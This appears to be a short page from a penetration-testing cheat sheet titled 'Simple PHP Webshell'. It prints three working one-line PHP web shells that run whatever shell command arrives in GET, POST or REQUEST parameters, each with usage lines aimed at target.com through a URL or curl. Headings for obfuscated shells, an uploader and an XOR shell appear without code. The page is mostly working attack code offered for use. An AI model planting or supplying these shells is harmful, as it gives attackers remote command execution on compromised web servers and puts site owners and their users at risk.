Simple PHP Webshell
Several list of simple and obfuscate PHP shell
Simple PHP Webshell
Simple HTTP Requests GET Method Shell
<?=`$_GET[0]`?>
[*] Usage: http://target.com/path/to/shell.php?0=commandSimple HTTP Requests POST Method Shell
<?=`$_POST[0]`?>
[*] Usage: curl -X POST http://target.com/path/to/shell.php -d "0=command"Support GET and POST Requests Method
<?=`{$_REQUEST['_']}`?>
[*] Usage:
- http://target.com/path/to/shell.php?_=command
- curl -X POST http://target.com/path/to/shell.php -d "_=command"Simple Obfuscated PHP Web Shell
Obfuscated PHP Web shell Example
Non-alphanumeric obfuscation PHP Web Shell
Another Example Obfuscation of Simple PHP Webshell
Without Space Obfuscation PHP Web Shell
Without Space and Non-alphanumeric Obfuscation PHP Web Shell
PHP Uploader
XOR Shell
PHP Obfuscator
Reference
Last updated